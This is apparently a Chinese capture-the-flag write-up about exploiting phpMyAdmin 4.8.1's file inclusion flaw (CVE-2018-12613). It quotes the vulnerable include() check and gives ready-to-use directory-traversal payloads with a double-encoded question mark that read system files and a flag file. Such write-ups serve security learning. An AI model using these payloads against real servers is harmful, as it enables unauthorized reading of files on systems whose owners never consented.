还挺大胆直接告诉人你有一个数据库 url后/phpmyadmin 跳到php后台了
然后看这版本4.8.1 有个漏洞叫(CVE-2018-12613) 可以远程文件包含漏洞
$target_blacklist = array (
‘import.php’, ‘export.php’
);
// If we have a valid target, let’s load that script instead
if (! empty($_REQUEST[‘target’])
&& is_string($_REQUEST[‘target’])
&& ! preg_match(‘/^index/‘, $_REQUEST[‘target’])
&& ! in_array($_REQUEST[‘target’], $target_blacklist)
&& Core::checkPageValidity($_REQUEST[‘target’])
) {
include $_REQUEST[‘target’];
exit;
}
满足5个条件后就会include$_REQUEST[‘target’]的内容
$_REQUEST[‘target’]不为空
$_REQUEST[‘target’]是字符串
$_REQUEST[‘target’]不以index开头
$_REQUEST[‘target’]不在$target_blacklist中 ‘import.php’, ‘export.php’
然后接下去的原理就看不懂了
任意文件包含
通过目录穿越包含任意文件 ?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini 这波这个payload就可以直接用了
?target=db_datadict.php%253f/../../../../../../../../../flag /../ 这个慢慢加加到出现flag即可